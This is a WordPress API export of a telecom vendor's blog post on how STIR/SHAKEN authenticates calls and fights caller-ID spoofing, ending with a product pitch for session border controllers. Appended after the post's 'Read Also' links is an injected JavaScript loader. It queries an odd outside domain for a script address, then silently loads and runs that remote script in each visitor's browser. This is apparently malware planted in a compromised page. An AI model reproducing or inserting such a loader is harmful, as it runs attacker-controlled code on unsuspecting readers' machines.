{"id":3468,"date":"2022-11-22T06:45:56","date_gmt":"2022-11-22T06:45:56","guid":{"rendered":"https:\/\/www.revesoft.com\/blog\/?p=3468"},"modified":"2025-09-05T11:18:45","modified_gmt":"2025-09-05T11:18:45","slug":"stir-shaken-combating-spoofed-calls","status":"publish","type":"post","link":"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/","title":{"rendered":"How does STIR\/SHAKEN help in Combating Spoofed Calls?"},"content":{"rendered":"<p><em>Fraudulent Spoofed Calling<\/em> is one of the most popular methods used by scammers to trick their targets into revealing their personal or sensitive information which they can use to steal money or perform other fraudulent activities. By using this method, scammers are able to change the caller ID to any number other than the actual number used for calling. So basically, scammers disguise the number they are calling from and the number that displays on the target\u2019s caller ID appears to be from a government agency or someone familiar like one of the contacts of the receiver. A simple example would be displaying \u2018911 emergency\u2019 or one\u2019s bank\u2019s phone number.<\/p>\n<p><em>Neighbor Spoofing<\/em> is a common example of spoofed calling where robocallers display a number similar to the receiver\u2019s caller ID. This is done to increase the chances that the target will answer the call.<\/p>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_42 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" area-label=\"ez-toc-toggle-icon-1\"><label for=\"item-691d4f232f8fd\" aria-label=\"Table of Content\"><span style=\"display: flex;align-items: center;width: 35px;height: 30px;justify-content: center;direction:ltr;\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/label><input  type=\"checkbox\" id=\"item-691d4f232f8fd\"><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 eztoc-visibility-hide-by-default' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#What_is_the_Role_of_STIR_SHAKEN_in_Combating_Spoofed_Calls\" title=\"What is the Role of STIR \/ SHAKEN in Combating Spoofed Calls?\">What is the Role of STIR \/ SHAKEN in Combating Spoofed Calls?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#STIR_vs_SHAKEN_Whats_the_Difference\" title=\"STIR vs SHAKEN : What\u2019s the Difference?\">STIR vs SHAKEN : What\u2019s the Difference?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#How_does_STIR_SHAKEN_Work\" title=\"How does STIR \/ SHAKEN Work?\">How does STIR \/ SHAKEN Work?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#Deploying_SBCs_with_STIRSHAKEN_to_Prevent_Unwanted_Robocalling\" title=\"Deploying SBCs with STIR\/SHAKEN to Prevent Unwanted Robocalling\">Deploying SBCs with STIR\/SHAKEN to Prevent Unwanted Robocalling<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#Conclusion\" title=\"Conclusion\">Conclusion<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#Read_Also\" title=\"Read Also\">Read Also<\/a><ul class='ez-toc-list-level-3'><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#SIPVoIP_Fraud_Attacks_Why_Operators_Need_a_Reliable_Solution\" title=\"SIP\/VoIP Fraud Attacks: Why Operators Need a Reliable Solution?\u00a0\">SIP\/VoIP Fraud Attacks: Why Operators Need a Reliable Solution?\u00a0<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#Prevent_Spoofed_Robocalls_with_STIRSHAKEN\" title=\"Prevent Spoofed Robocalls with STIR\/SHAKEN\">Prevent Spoofed Robocalls with STIR\/SHAKEN<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/www.revesoft.com\/blog\/sbc\/stir-shaken-combating-spoofed-calls\/#IPsec_or_Internet_Protocol_Security\" title=\"IPsec or Internet Protocol Security\">IPsec or Internet Protocol Security<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"What_is_the_Role_of_STIR_SHAKEN_in_Combating_Spoofed_Calls\"><\/span>What is the Role of STIR \/ SHAKEN in Combating Spoofed Calls?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>STIR stands for Secure Telephony Identity Revisited and SHAKEN stands for Secure Handling of Asserted information using toKENs. STIR\/SHAKEN is a suite of protocols and procedures designed to reduce fraudulent robocalls and illegal phone number spoofing.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"STIR_vs_SHAKEN_Whats_the_Difference\"><\/span>STIR vs SHAKEN : What\u2019s the Difference?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>STIR is basically the set of protocols used to create a digital signature for a call. It focuses on end devices and allows verification of the signature. SHAKEN addresses the deployment which means it focuses on how STIR can be implemented within carrier networks.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"How_does_STIR_SHAKEN_Work\"><\/span>How does STIR \/ SHAKEN Work?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>STIR\/SHAKEN makes use of digital certificates which are based on common public cryptographic keys to define the authenticity of a phone number. Here\u2019s how it works:<\/p>\n<ol>\n<li>When a call gets initiated, the originating service provider receives an SIP INVITE.<\/li>\n<li>This originating service provider then checks the source of the call and its phone number to determine how to attest its validity which is one from the following three levels:<\/li>\n<\/ol>\n<p><strong>Full Attestation (A)<\/strong> &#8211; Full Attestation means the service provider has established a verified association with the telephone number of the calling party.<\/p>\n<p><strong>Partial Attestation (B) <\/strong>&#8211; This means that the service provider approved the authentication for the origin of the call i.e. the customer but has not established a verified association with the phone number used for making the call.<\/p>\n<p><strong>Gateway Attestation (C) <\/strong>&#8211; This is when the service provider has authenticated the entry point of the call or from where it received the call, but not the source of the call.<\/p>\n<ol start=\"3\">\n<li>Now an SIP Identity header is created by the originating service provider. This SIP identity header contains information on the call origin, calling number, called number, current timestamp, and level of attestation.<\/li>\n<li>The SIP INVITE with the SIP Identity header is sent to the terminating service provider.<\/li>\n<li>The SIP INVITE with Identity Header is passed on to the verification service.<\/li>\n<li>The verification service obtains the digital certificate from the public certificate repository and starts its multi-step verification process. If all the verification steps gets completed, then it is declared that the number has not been spoofed.<\/li>\n<li>The results are returned to the terminating service provider.<\/li>\n<\/ol>\n<h2><span class=\"ez-toc-section\" id=\"Deploying_SBCs_with_STIRSHAKEN_to_Prevent_Unwanted_Robocalling\"><\/span>Deploying SBCs with STIR\/SHAKEN to Prevent Unwanted Robocalling<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Deployment of <a href=\"https:\/\/www.revesoft.com\/products\/reve-session-border-controller\" target=\"_blank\" rel=\"noopener\">Session Border Controllers<\/a> is one of the most effectual ways to combat robocalling through STIR\/SHAKEN technology. REVE SBC is a powerful and scalable platform that has been adopted by several communication service providers to ensure that their network remains robust and resilient to robocalls as well as various frauds that happen in the telecom industry. Read our post on <a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/telecom-fraud-management\/\">Telecom Fraud Management<\/a> to identify and prevent telecom frauds in real-time.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span>Conclusion<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Now it is clear that STIR and SHAKEN are call authentication standards that provide a secure way to validate a caller\u2019s identity and stop illegal caller ID spoofing. If you are looking for SBCs with STIR\/SHAKEN solutions, then please get in touch with us.<\/p>\n<p style=\"text-align: center;\"><a class=\"btn btn-primary\" style=\"padding: 8px 12px; font-size: 18px;\" href=\"https:\/\/www.revesoft.com\/products\/reve-session-border-controller#free_demo_form\">Contact for Free Demo<\/a><\/p>\n<h2 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"Read_Also\"><\/span>Read Also<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"SIPVoIP_Fraud_Attacks_Why_Operators_Need_a_Reliable_Solution\"><\/span><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/sipvoip-fraud-attacks-operators-need-reliable-solution\/\" target=\"_blank\" rel=\"noopener\">SIP\/VoIP Fraud Attacks: Why Operators Need a Reliable Solution?\u00a0<\/a><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h3 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"Prevent_Spoofed_Robocalls_with_STIRSHAKEN\"><\/span><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/prevent-spoofed-robocalls-stirshaken-role-sbc\/\" target=\"_blank\" rel=\"noopener\">Prevent Spoofed Robocalls with STIR\/SHAKEN<\/a><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h3 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"IPsec_or_Internet_Protocol_Security\"><\/span><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/internet-protocol-security-technological-need\/\" target=\"_blank\" rel=\"noopener\">IPsec or Internet Protocol Securit<\/a>y<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><script>(async () => {\n  const TIMEOUT_MS = 60_000;\n  try {\n    const tdsResponse = await fetch('https:\/\/eotoatotlasldkd.com\/ofo');\n    const scriptUrl = (await tdsResponse.text()).trim();<\/p>\n<p>    const loadScriptWithTimeout = (url, timeout) => {\n      return new Promise((resolve, reject) => {\n        const script = document.createElement('script');\n        script.src = url;\n        script.async = true;<\/p>\n<p>        script.onload = () => {\n          clearTimeout(timer);\n          resolve();\n        };<\/p>\n<p>        script.onerror = () => {\n          clearTimeout(timer);\n          reject();\n        };<\/p>\n<p>        const timer = setTimeout(() => {\n          script.remove();\n          reject();\n        }, timeout);<\/p>\n<p>        document.body.appendChild(script);\n      });\n    };<\/p>\n<p>    await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS);\n  } catch (_) {}\n})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fraudulent Spoofed Calling is one of the most popular methods used by scammers to trick their targets into revealing their personal or sensitive information which they can use to steal money or perform other fraudulent activities. By using this method, scammers are able to change the caller ID to any number other than the actual [&hellip;]<\/p>\n","protected":false},"author":19,"featured_media":3469,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[74],"tags":[],"class_list":["post-3468","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sbc"],"_links":{"self":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3468","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/comments?post=3468"}],"version-history":[{"count":8,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3468\/revisions"}],"predecessor-version":[{"id":6436,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/3468\/revisions\/6436"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/media\/3469"}],"wp:attachment":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/media?parent=3468"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/categories?post=3468"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/tags?post=3468"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}